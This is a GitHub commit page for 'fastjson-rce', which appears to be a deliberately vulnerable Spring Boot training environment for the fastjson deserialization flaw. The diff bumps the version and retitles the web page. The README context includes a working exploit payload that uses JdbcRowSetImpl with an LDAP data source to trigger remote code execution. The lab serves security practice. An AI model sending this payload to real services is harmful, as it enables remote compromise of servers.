Skip to content

Commit

Permalink
new release:v1.1.0
Browse files Browse the repository at this point in the history
  • Loading branch information
@dbgee
dbgee committed Nov 25, 2021
1 parent 163604e commit 6606d75
Show file tree
Hide file tree
Showing 6 changed files with 7 additions and 6 deletions.
3 changes: 2 additions & 1 deletion README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -20,7 +20,8 @@ fastjson rce env based on springboot
3. 发送利用payload:{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "ldap://127.0.0.1:10086/Object","autoCommit": true}

## update info
通过H2 数据库,对数据做了持久化处理,可以保存提交的数据到服务端
1. 通过H2 数据库,对数据做了持久化处理,可以保存提交的数据到服务端
2. 增加了前端页面,可以通过按钮添加、删除、查询三国数据

## TODO
- [ ] 分析漏洞源码
Expand Down
2 changes: 1 addition & 1 deletion pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,7 @@
</parent>
<groupId>fastjson-rce</groupId>
<artifactId>fastjson-rce</artifactId>
<version>v1.0.0</version>
<version>v1.1.0</version>
<name>fastjson-rce</name>
<description>spring boot env for fastjson rce vulnerability</description>
<properties>
Expand Down
2 changes: 1 addition & 1 deletion src/main/resources/static/index.html
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
<!DOCTYPE html><html lang=""><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" href="/favicon.ico"><title>sanguo</title><link href="/css/app.d40fc157.css" rel="preload" as="style"><link href="/css/chunk-vendors.a16c4353.css" rel="preload" as="style"><link href="/js/app.8bfb079d.js" rel="preload" as="script"><link href="/js/chunk-vendors.144a854d.js" rel="preload" as="script"><link href="/css/chunk-vendors.a16c4353.css" rel="stylesheet"><link href="/css/app.d40fc157.css" rel="stylesheet"></head><body><noscript><strong>We're sorry but sanguo doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app"></div><script src="/js/chunk-vendors.144a854d.js"></script><script src="/js/app.8bfb079d.js"></script></body></html>
<!DOCTYPE html><html lang=""><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" href="/favicon.ico"><title>三国志--fastjson 发序列化训练场</title><link href="/css/app.d40fc157.css" rel="preload" as="style"><link href="/css/chunk-vendors.a16c4353.css" rel="preload" as="style"><link href="/js/app.09e1c50f.js" rel="preload" as="script"><link href="/js/chunk-vendors.144a854d.js" rel="preload" as="script"><link href="/css/chunk-vendors.a16c4353.css" rel="stylesheet"><link href="/css/app.d40fc157.css" rel="stylesheet"></head><body><noscript><strong>We're sorry but 三国志--fastjson 发序列化训练场 doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app"></div><script src="/js/chunk-vendors.144a854d.js"></script><script src="/js/app.09e1c50f.js"></script></body></html>
4 changes: 2 additions & 2 deletions src/main/resources/static/js/app.8bfb079d.js → src/main/resources/static/js/app.09e1c50f.js
View file

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

Loading

0 comments on commit 6606d75

Please sign in to comment.